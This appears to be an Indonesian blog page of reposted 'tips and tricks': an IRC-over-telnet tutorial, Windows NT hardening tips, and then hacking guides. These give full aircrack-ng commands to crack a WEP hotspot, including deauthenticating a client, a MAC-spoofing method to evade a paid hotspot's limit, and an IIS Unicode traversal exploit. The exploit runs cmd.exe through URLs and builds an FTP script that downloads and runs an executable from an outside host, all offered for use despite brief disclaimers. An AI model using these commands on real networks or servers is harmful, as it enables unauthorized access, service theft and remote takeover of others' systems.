Membuat koneksi langsung ke sebuah IRC server dan meluangkan sedikit waktu untuk mencoba perintah protokol IRC hingga anda bisa menggunakan program secara langsung
Jarkko Oikarinen pertama kali mengenalkan IRC ke seluruh dunia pada tahun 1988. Lima tahun yang lalu, dia benar-benar telah mendefinisikan protokol IRC dalam RFC 1459, yang membuat seluruh protokol menjadi lebih bisa diakses. Berangkat dari informasi ini, anda dapat lebih memahami protokol berbasis teks sederhana dan mempelajari cara terhbung ke IRC server tanpa menggunakan client khusus. Saat anda menguasai hal ini, anda seharusnya dengan mudah menulis program ylang terhubung ke IRC.
TIP
Anda dapat menemukan seluruh dokumen Internet RFC (Request for Comment) di http://www.faqs.org/rfcs. anda dapat mencari arsip tersebut dengan kata atau nomor dokumen. RFC 1459 dapat ditemukan di http://www.faqs.org/rfcs/rfc1459.html
Sayangnya, anda tidak perlu mengetahui seluruh spesifikasi lengkap untuk terhubung ke sebuah IRC server. Menghubungkan diri ke suatu IRC server hanya memerlukan beberapa perintah yang dikirim. Cara terbaik untuk memahami bagaimana perintah ini bekerja adalah terhubung langsung ke IRC server dengan Telnet dan mengetik perintah ini secara langsung. telnet memungkinkan anda untuk menyesuaikan koneksi TCP ke sebuah port pada remote machine dan tinggal mulai mengetik perintah yang berfungsi service listening pada port tersebut.
Kebanyakan IRC server dijalankan pada port 6667, walaupun anda bsia saja menemukan beberapa operasi tersebut pada nomor port yang berbeda untuk membantu user yang terhalang firewall perusahaan. Pada contoh ini, anda dapat mencoba menghubungkan diri ke jaringan freenode IRC dengan menjalankan Telnet dari command prompt dengan parameter baris perintah berikut:
% telnet irc.freenode.net 6667
Jika koneksi tersebut berhasil, anda akan melihat server merespon dengan sesuatu seperti ini:
NOTICE AUTH :*** Looking up your hostname...
NOTICE AUTH :*** Found your hostname, welcome back
NOTICE AUTH :*** Checking ident
NOTICE AUTH :*** No identd (auth) response
Meski socket tersebut pada dasarnya terhubung ke IRC server, anda masih harus melakukan beberapa hal. RIC server perlu mengetahui login anda, real name dan nickname yang ingin anda gunakan.
Perintah NICK digunakan untuk menetapkan nickname anda. Dilakukan secara langsung, jadi jika anda ingin nickname “si_cebol”, maka tinggal mengetik ke Telnet Window tersebut dan menekan Enter.
NICK si_cebol
Jika nick name tersebut telah didaftar orang lain pada server tersebut, anda diberitahukan untuk tetap mengirim perintah yang sama dengan nickname yang berbeda pada suatu waktu, hingga anda menemukan salah satu yang sesuai. Jenis pesan inilah yang akan anda lihat jika nickname yang dipilih telah digunakan orang lain.
:kornbluth.freenode.net 433 * si_cebol :Nickname is already in use.
Perintah USER yangdigunakan untuk login, mode user dan real name. Jika mau untuk login “si_cebol” maka tinggal mengetikkan perintah berikut, kemudian tekan Enter.
USER si_cebol 8 * : Iwan Permana
Kebanyakan server saat ini menggunakan perintah dari IRC RFC 2812 yang diupdate. Perintah User membuat penggunaan beberapa fitur tertentu dalam update dokumen ini. Terutama, angka 8 adalah numeric mode parameter yang digunakan secara otomatis untuk menetapkan mode user saat mendaftar pada server tersebut. Paramater ini merupakan sebuah bit mask, dengan bit 2 yang mewakili user mode w dan bit 3 yang mewakili user mode i, jadi menggunakan nilai 8 artinya bahwa anda menanyakan server tersebut untuk menetapkan mode invisible bagi anda. Sekarang, tinggal 2 bit yang tergolong signifikan. Juga perlu dicatat bahwa teks setelah tanda : adalah dimana anda mengisikan real name.
Setelah berhasil mengirimkan perintah NICK dan USER, server tersebut akan mengirimkan beberapa baris teks kepada anda. Jika tidak terjadi apapun untuk beberapa sat, jangan cemas—server tersebut mungkin mengalami gangguan suatu artificialdelay hingga 1 menit, jika tidak menemukan suatu Ident server yang dijalankan pada mesin anda. Pertama kali, beris tersebut dikirm dari server yang jarang terpengaruh kondisi ini, tapi mungkin anda mengenal beberapabagian dari message of the day “You are now connected to the IRC server!
TIP
Ident (Identification Protocol) merupakan dokumentasi RFC 1413. Lihat http://www.faqs.org/rfcs/rfc1413.html untuk keterangan lengkapnya.
Sekarang anda telah terhubung, anda dapat menggunakan fungsi IRC client secara total sepanjang yang bisa dilakukannya.
Staying Alive
Terkadang kesulitan pada IRC server untuk menjaga track yang masih terhubung. Satu trik yang mereka lakukan adalah mengirim perintah PING ke client yang tidak melakukan aktifitas apapun. Client tersebut diahrapkan merespon dengan pesan PONG atau katakanlah, “Hei, Saya masih disini!” Jika client tersebut tidak merespon dalam suatu waktu, server tersebut akan menutup koneksinya. Aturan Umum yang berlaku, PONG reply harus termasuk argumen yang dikirim sebagai bagian dari perintah ping dari server tersebut. Jadi jika anda menerima pesan berikut ini:
PING :kornbluth.freenode.net
Anda akan me-reply dengan perintah PONG berikut:
PONG :kornbluth.freenode.net
Join ke Channel dan Mengirim Pesan
Perintah IRC client seperti /join dan /msg tidak akan bekerja disini, anda harus menyesuaikan dengan protokol langsung tersebut. Anda dapat menganggap koneksi Telnet sebagai suatu bentuk primitif IRC client—anda masih bisa melakukan apapun yang bisa IRC client lakukan, hanya saja terlihat sedikit kaku dan perintahnya berbeda. Meski begitu, masih lebih mudah join ke channel dan mengirim pesan ke user lain. Untuk join ke channel #irchacks, anda harus mengetik.
JOIN #irchacks
Jika seluruhnya berjalan baik, anda dapat melihat IRC server me-reply dengan beberapa baris teks. IRC client menggunakan baris ini untuk menetapkan siapa yang ada dalam channel tersebut jadi mereka dapat mengupdate daftar usernya. Untuk saat ini, anda tidak perlu mencemaskan tentang bagaimana proses informasi tersebut.
Mengirimkan pesan tanpa instuisi yang jelas dapat dilakukan dengan perintah PRIVMSG. Sebagaimana yang anda harapkan dari nama terserbut, perintah ini dapat digunakan untuk mengirim private message ke user lain, juga dapat digunakan untuk mengirim pesan ke channel yang ada. Untuk mengirim pesan ke channel #irchacks, anda dapat mencoba perintah berikut:
PRIVMSG #irchacks :Hello everybody!
Mengirimkan private message cukup mudah—tinggal mengunakan nickname penerima pesan yang ditempatkan pada nama channel tersebut. Jika anda ingin mengirim suatu private message ke user dengan nickname “B0iler”, anda ketik saja:
PRIVMSG
B0iler
Hi B0iler.
Ketika anda bosan dengan memamerkan keahlian protokol yang baru anda temukan, anda dapat keluar dari server tersebut dengan perintah QUIT. Penggunaan perintah ini akan menyebabkan server tersebut menutup koneksi anda.
QUIT
Perintah QUIT dapat menggunakan parameter opsi. Parameter tersebut harus didahului dengan sebuah karakter ‘:’ apapun yang anda ketikan akan ditampilkan ke user lain, sebagai alasan mengapa anda keluar dari server tersebut.
QUIT :Telnet is cool!
Apapun metode yang anda gunakan untuk keluar dari server, sebelum disconnect, akan merespon dengan suatu baris:
ERROR :Closing Link: si_cebol (Client Quit)
Juga dimungkinkan untuk anda menutup koneksi dengan menutup Telnet, namun ahal ini tidak memungkinkan anda untuk mengetikan alasan anda keluar dari server tersebut.
Bila seluruh perintah diketik dalam huruf kapital, anda mungkin menemukan bahwa kebanyakan server bsia menerima kebijakan tersebut. Saat ini yang anda mengetahui apa yang harus diketik untuk terhubung ke IRC server, berikutnya kita akan belajar membuat program yang menghubungkan diri kita ke IRC server.
Salam.
Sumber :
Indonewbies.tk
Labels
- Aplikasi (3)
- ebook gratis (4)
- Nokia (1)
- Ponsel Syambian (2)
- Sofewre Gratis (15)
- Tips dan Trik (19)
- Tutorial (5)
- UANG GRATIS (2)
Chating Melalui Telnet
Diposting oleh
GUDANG DOWNLOAD GRATIS
di
19.43
0
komentar
Label: Tips dan Trik
menjadi WinNT lebih aman
Adapun daftar hal yang menjadi WinNT lebih aman, termasuk deteksi intrusi yang baik sebagai tindakan preventif. Berikut ini daftar hal yang penting untuk dilakukan.
1. Install service pack termutakhir dan "hot fix"-nya.
2. Gunakan NTFS sebagai ganti dari FAT. NTFS mengijinkan permisi diset dan auditing pada setiap basis file/direktori.
3. Ganti account "administrator". Serangan umumnya menggunakan suatu Dictionary atau Brute Force attack pada account "administrator".
4. Membuat account baru bernama "administrator" untuk mendeteksi usaha-usaha intrusi.
5. Disable account "guest". Anda boleh juga mengganti account ini (misalnya seperti "administrator"). Saat anda mengganti account "guest", anda mungkin ingin membuat account baru bernama "guest" untuk mendeteksi usaha-usaha hacking.
6. Aktifkan auditing pada "HKEY_LOCAL_MACHINE\Security" agar mendeteksi browsing registry secara remote.
7. Enable-kan "Password Protected" pada screensaver.
8. Non-Aktifkan automatic sharing dari ADMINS$, C$, D$, dsb melalui parameter "AutoShare" pada registry. Parameter ini berada pada "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
LanmanServer\Parameters", dan "AutoShareServer" pada WinNT Server atau "AutoShareWks" pada WinNT Workstation. Ini merupakan sebuah DWORD, dengan nilai '1' yang enabled (default), atau sebuah nilai '0' untuk disabled. Anda harus menambah nilai buatan anda sendiri karena hal ini tidak ada dalam registry tersebut.
Penulis
Si Cebol
Sumber
Indonewbies.tk
Diposting oleh
GUDANG DOWNLOAD GRATIS
di
19.37
0
komentar
Label: Tips dan Trik, Tutorial
Menjebol Proteksi WEP
Ini adalah bagian kedua dari praktek Menjebol HotSpot. Jikalau pada artikel sebelumnya kita membahas bagaimana menembus batas proteksi MAC address, pada kali ini kita akan membahas bagaimana mendapatkan akses HotSpot yang menggunakan WEP (Wired Equivalent Privacy) Keys.
Alat yang kita butuhkan adalah :
1. Sebuah Laptop
2.Sebuah Wireless Adapter yang mendukung Mode Monitoring dan Injection.
3.Linux Live CD distro : Backtrack 2.0
Mengapa kita membutuhkan Laptop ? Tentu saja karena akses HotSpot biasanya diberikan untuk pengguna yang Mobile. Dan dengan laptop kita memiliki fleksibilitas yang tinggi pula.
Lalu apa yang dimaksud dengan Wireless Adapter yang mendukung mode monitoring dan injection ? Perlu anda ketahui, tidak semua Wireless Adapter yang ada dipasaran, maupun yang sudah built in dalam laptop, mendukung mode monitoring dan injection yang diperlukan untuk WEP hacking ini.
Yang perlu anda perhatikan adalah Chip dari Wireless Adapter anda. Chip terbaik dalam melakukan wireless hacking adalah Atheros dan Ralink. Namun Atheros adalah pilihan utama. Tidak banyak wireless adapter yang memiliki chip atheros di Indonesia, anda dapat mencari beberapa merk dibawah ini :
1. 3Com 3CRPAG175B
2.3Com 3CRXJK10075
3.DLINK DWL-G630 Rev C
4.Linksys WPC55AG
5.TrendNET TEW-441PC
6.TrendNET TEW-443PI
7.TP-LINK TL-WN610G
Jika anda telah memilikinya, maka anda dapat memulai Langkah pertama dalam Wireless Hacking ini
yaitu lakukan booting dengan CD Backtrack anda .
Langkah kedua tentu saja, langsung buka console anda dan ketikkan command berikut(saya asumsikan wireless adapter anda berchipset atheros) :
airmon-ng stop ath0
airmon-ng start wifi0
Kedua command ini berguna untuk mengaktifkan mode monitoring dan injection pada wireless adapter anda. Kemudian lanjutkan dengan monitoring jaringan wireless dengan mengetikkan command berikut :
airodump-ng ath0
Akan tampil seluruh jaringan wireless yang terdeteksi seperti diatas. Tampak terlihat Access Point Rek-1 diproteksi dengan WEP Encryption. itulah korban kita. AP Rek-1 diset pada Channel 6 dan memiliki BSSID 00:19:5B:5C:62:92 . Sekarang saatnya melakukan penyerangan.Buka Console baru dan ketikkan :
airodump-ng –channel 6 –bssid 00:19:5B:5C:62:92 -w hasil ath0
Perintah diatas akan mengumpulkan paket data yang dibutuhan untuk proses Cracking.
Selanjutnya lakukan injeksi paket pada Client yang terkoneksi pada AP untuk mendapatkan paket ARP lebih cepat. Bukalah lagi Console baru tanpa menutup console yang sebelumnya dan ketik :
aireplay-ng –arpreplay -b 00:19:5B:5C:62:92 -h 00:19:D2:45:D0:EB ath0
Client yang diserang ini memiliki Mac address 00:19:D2:45:D0:EB (lihat pada screenshot diatas pada tabel station yang terletak dibawah) . Anda tidak menemukan Mac address 00:19:D2:45:D0:EB pada screenshot ? tentu saja karena saat dilakukan screenshot belum terdeteksi
Tidak sabar menunggu ? Untuk mempercepat lagi datangnya ARP , maka kita dapat melakukan serangan Deauthentication untuk memutuskan hubungan Client ke AP sehingga ARP yang biasanya didapat saat awal koneksi client dapat lebih cepat didapat. Bukalah console baru sekali lagi dan ketikkan :
aireplay-ng –deauth 5 -c 00:19:D2:45:D0:EB -a 00:19:5B:5C:62:92 ath0
Hasil dari ketiga perintah ini dapat anda lihat pada screenshot dibawah ini :
I Like this Screenshot
Sampai sejauh ini anda telah melakukan pengumpulan paket yang dibutuhkan untuk menjebol WEP Keys. Langkah terakhir yang harus anda lakukan adalah buka console baru lagi dan ketikkan perintah berikut :
aircrack-ng hasil*.cap
atau apabila anda memiliki aircrack versi terbaru anda dapat juga mengetikkan perintah seperti berikut :
aircrack-ptw hasil-01.cap
Dan tunggulah beberapa menit hingga anda mendapatkan key tersebut
Maaf Screenshot yang satu ini lupa saya buat, tapi yang pasti saya berhasil melakukannya dalam waktu 30 Menit dengan perintah aircrack-ptw hasil-01.cap .
Tertarik melakukannya ?
Sumber :http://agunk.wordpress.com/2007/11/01/menjebol-proteksi-hotspot/
Diposting oleh
GUDANG DOWNLOAD GRATIS
di
19.33
0
komentar
Label: Tips dan Trik, Tutorial
Menjebol Proteksi HotSpot
Hari gini internet kabel ?
Seperti kita ketahui, HotSPOT atau tempat akses internet Wireless dengan standard 802.11b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita berpergian di tempat publik seperti Mall, Cafe, hotel dan kantor, dengan mudahnya kita menemukan fasilitas tersebut.
Namun sangat disayangkan tidak semua penyedia layanan menawarkan fasilitas Internet Wireless dengan gratis, atau kalaupun gratis, sangatlah terbatas.
Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.
Apa itu MAC Adress ?
In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs).
Oke jadi kesimpulannya MAC Address adalah nomer unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita.
Contoh kasus adalah HotSPOT di Food Court Plasa Semanggi. Ini adalah tempat favorit saya berinternet selain di Kampus Atma Jaya .
Pada HotSPOT FoodCourt Plasa Semanggi , sang penyedia layanan Internet Wireless, membatasi penggunaan Internet gratis hanya selama 3 Jam, setelah itu anda tidak dapat mengakses internet lagi, dan baru akan dapat mengakses lagi di hari esok. Jenis proteksi yang digunakan adalah MAC Address Filtering.
Kondisi yang saya hadapi adalah : saya ingin mengerjakan tugas kuliah di food court itu sembari makan dan minum dan saya membutuhkan akses internet.Untuk menyelesaikan tugas, saya dan teman-teman membutuhkan waktu lebih dari 3 jam.
Bagaimana menjebol Proteksi dengan MAC Address ?
Ada sebuah tools yang sangat bermanfaat untuk anda.Tools itu bernama K-MAC.Anda dapat mendownloadnya disini : http://www.neset.com/download/?k-mac.zip
Dengan tools ini anda akan dapat mengubah MAC-Address anda secara instant dan apa artinya ? Anda dapat menjebol Proteksi MAC Address ! Setiap jatah akses internet anda habis dalam waktu 3 jam, yang anda perlu lakukan hanyalah mengubah MAC Address anda, dan lakukan koneksi kembali
Sumber :http://agunk.wordpress.com/2007/11/01/menjebol-proteksi-hotspot/
Diposting oleh
GUDANG DOWNLOAD GRATIS
di
19.28
0
komentar
Label: Tips dan Trik, Tutorial
tutor unicode
Hello temanku ini mungkin bug lama dan sangat lama tapi masih perlu juga lho.....
Sincan2
Awal dan dasar-dasar mengenai hubungan tcp/ip, cara daemon server bekerja , serta cara memanfaatkan kelemahan daemon server dengan exploit telah dibahas pada NeoTek Vol. II, No. 2 November 2001. Maka kali ini pembahasan akan difokuskan pada pemanfaatan bug yang ada pada iis (Internet Information Service) yakni sebuah service yang terinstal pada Microsoft Windows nt System. Layanan iis ini terdiri atas ftp Service dan Web Service yang listening pada port 21 dan 80.
Persiapan Awal
Karena sangat diharamkan untuk belajar hacking pada sistem orang lain (supaya tidak dikatakan perusak) maka saya sarankan untuk mencoba menginstal sendiri nt System pada pc anda dan jangan lupa aktifkan juga IIS. Untuk Nt4 terinstall dengan iis-4 sedangkan Windows2000 terinstall iis-5.
Setelah pada pc anda terinstall iis, maka anda bisa langsung mulai hacking nt. Coba uji kembali dengan browsing http://localhost/ dari browser anda. Apabila sudah ada tampilan halaman default dari iis, maka iis anda sudah berjalan dengan mulus.
Deteksi Hole Pada IIS
IIS memiliki sejumlah bug yang terkenal dengan sebutan Unicode Bug. Inilah daftar dari sejumlah Unicode Bug tersebut:
..%255c..%255c
..%252e..%252e
..%%35c..%%35c
..%c0%af..
..%c1%af..
..%c1%9c..
..%c1%pc..
..%c1%1c..
..%c0%9v..
..%c1%8s..
..%e0%80%af..
..%f0%80%80%af..
..%f8%80%80%80%af..
..%fc%80%80%80%80%af..
..%25%35%63..%25%35%63
..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../
Lalu bagaimanakah cara memanfaatkannya? IIS memiliki folder khusus untuk menjalankan script-script yakni:
/scripts
/cgi-bin
/msadc
/_vti_bin
/_vti_cnf
/iisadmpwd
Format untuk mengetahui apakah server anda memiliki unicode bug atau tidak, bisa dicoba dengan langsung mentesnya pada web browser.
http://localhost/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Misalnya ada tampilan yang menunjukkan file-file, maka dipastikan server anda memiliki unicode bug yang bisa dimanfaatkan. Lalu coba lagi untuk folder cgi-bin, msadc, vtibin, dll. Jangan lupa juga ganti dengan unicode lainnya apabila tidak berhasil.
Aplikasi Unicode Bug
Unicode bug ini merupakan kelemahan pada IIS yang memungkinkan seseorang untuk menjalankan command- command pada shell windows langsung. Jadi command-command seperti dir, mkdir, copy, ping, bahkan sampai pada format, del, deltree yang sifatnya merusak pun bisa dijalankan.
Cuma sekali lagi saya sarankan janganlah berbuat merusak kalau ini anda praktikkan terhadap server yang bukan milik anda (remote server). Kita sesama pengguna Internet diharapkan menjadi teman, dan bukan musuh satu sama lain yang saling menghancurkan.
Lantas bagaimana cara mengetahui folder index daripada webserver IIS ? coba ketikkan http://localhost/t3rm.ida dan pada browser akan menampilkan lokasi folder index web berada. Biasanya hal ini digunakan untuk mencari file index.htm dan akhir-akhirnya digunakan untuk deface halaman index dari suatu web. Percayalah deface bukan hal yang baik untuk dilakukan, kalau anda mau pamer untuk menampikan identitas anda, pasang saja webserver yang berjalan di port lain lalu disitu buat sesuka anda file index.htm nya, dibandingkan harus deface file html yang bukan milik kita dan apalagi menghapus file-file penting di website tersebut.
Lalu bagaimana caranya meng-upload webserver atau daemon-daemon yang berguna lainnnya ke sana ?
Gambaran langkah-langkahnya seperti ini: setiap nt Server memiliki file ftp.exe yang berguna untuk melakukan ftp upload dan download file ke host tujuan. Nah nt Server yang memiliki Unicode Bug itu kita suruh melakukan download ke host milik kita yang sudah ditaruh macam-macam daemon siap pakai. Cobalah taruh di free host yang ada di Internet seperti Geocities, Freeservers dll.
Langkah-langkah menempatkan program kita ke server nt tujuan hacking.
Carilah folder tersembunyi yang bisa dijadikan sebagai markas bersarangnya program-program kita. Misal:
C:\Program Files\ atau
C:\Inetpub dsb.
Lalu uji apakah folder tersebut memiliki akses ‘Read and Write,’ dalam arti apakah folder itu diberi akses untuk del, mkdir, modifikasi file, dsb. Misal akan di-copy-kan ke folder Program Files, lakukan command ini di browser:
http://localhost/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\progra~1\t3rm.exe.
Apabila folder Program Files diberi akses ‘Read and Write’ maka akan ada tampilan error dan ada tulisan ‘1 file coppied.’ Selamat! Berarti anda telah berhasil menyelesaikan langkah pertama yakni menentukan lokasi markas besar anda.
Untuk selanjutnya perintah unicode sudah dapat anda singkat menjadi
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+
Karena anda akan menggunakan ftp yang dioperasikan secara otomatis melalui script ftp, maka buatlah script ftp. Perintah yang digunakan adalah ECHO. Bentuk umum penggunaan ECHO adalah echo perintah-ftp >> nama-file-script-ftp.txt
Oke, berikut dicontohkan isi file t3rm.ftp yang akan saya gunakan untuk download file irc.exe yang saya miliki di freeserver geocities.com
OPEN GEOCITIES.COM
T3RM
PASSWORDSAYA
LCD C:\PROGRA~1\
BINARY
GET IRC.EXE
CLOSE
Penjelasan dari perintah-perintah tersebut:
· OPEN merupakan perintah untuk melakukah hubungan ftp ke server tujuan, dimana server tujuan saya adalah geocities.com.
· T3RM merupakan username saya
· PASSWORDSAYA merupakan password yang harus saya isikan.
Lalu setelah berhasil login ke sana, saya menentukan lokasi tempat download saya di server nt yang saya hack di mana pada skrip di atas adalah C:\PROGRAM FILES\ , setelah itu karena jenis file yang akan saya download adalah exe maka saya tentukan jenis transfernya binary. Untuk file-file seperti tar.gz, zip, gunakan juga binary. Hanya untuk file-file seperti html, txt, doc, baru gunakan ascii untuk transfernya.
Lantas bagaimana perintah membuat skrip tsb? Masukkan satu persatu seperti berikut dan tunggu sampai muncul tampilan ‘error CGI Filename****.’ Hal tersebut berarti menandakan anda berhasil:
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+OPEN+GEOCITIES.COM+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+T3RM+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+PASSWORDSAYA+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+LCD+C:\PROGRA~1\+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+BINARY+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+GET+IRC.EXE+>>+C:\PROGRA~1\t3rm.ftp
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+echo+CLOSE+>>+C:\PROGRA~1\t3rm.ftp
Oke, skrip yang anda buat sudah selesai dan silakan lihat kembali keseluruhan isi dari skrip dengan perintah:
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+type+c:\progra~1\t3rm.ftp
Apakah semuanya sudah sesuai dengan urutan? Kalau sudah oke dan sesuai dengan urutannya, maka jalankan FTP dengan menggunakan skrip tersebut dengan perintah:
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+ftp+-s:c:\progra~1\t3rm.ftp
Tunggu prosesnya beberapa saat dan jangan tutup browser.
Buka browser satu lagi dan masukkan perintah
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+dir+c:\progra~1\
Refresh berulang kali sampai file irc.exe sudah nampak dan sizenya sesuai dengan size yang ada pada server geocities.
Kalau sudah selesai berarti langkah selanjutnya adalah jalankan file irc.exe tersebut.
http://localhost/scripts/..%255c..%255cprogra~1/t3rm.exe?/c+c:\progra~1\irc.exe
Kalau saja file irc.exe merupakan sebuah program proxy irc dan listening di port anggaplah 8080, maka karena sudah dijalankan di PC anda, rekan anda pun bisa memanfaatkannya asal dia tahu port dan IP address anda di Internet. Jadi sungguhlah berbahaya apabila anda memiliki server nt yang memiliki bug unicode, terlebih lagi serangan code red pun menggunakan teknik yang sama seperti ini. Bandwidth kita akan habis, dan kita pun bisa dijadikan sebuah benteng pertahanan bagi orang-orang yang tidak bertanggung jawab. Untuk para pemilik server nt yang memiliki unicode bug ini, saya sarankan untuk sesegera mungkin patch server anda, atau uninstall IIS dan ganti dengan daemon yang lain.
Demikianlah artikel saya kali ini mengenai langkah-langkah dasar memanfaatkan unicode bug pada server nt. Anda bisa mengembangkannya ke banyak hal seperti membuat Proxy Server, Irc Server, WebServer, Streaming Audio Server, dsb pada server nt yang memiliki lubang keamanan tsb. Cuma saran saya jadikanlah sebagai eksperimen saja, dan jangan merusak. Kalau perlu beritahu pemilik server agar sesegera mungkin patch servernya.
Bila ada editan yang salah saya mohon maaf sebesar-besarnya dan mungkin temanku sekalian bisa menambahkannya...
Trims to :
coldboys
kamesywara
Met happy ria aja
Diposting oleh
GUDANG DOWNLOAD GRATIS
di
19.23
0
komentar
Label: Tips dan Trik, Tutorial



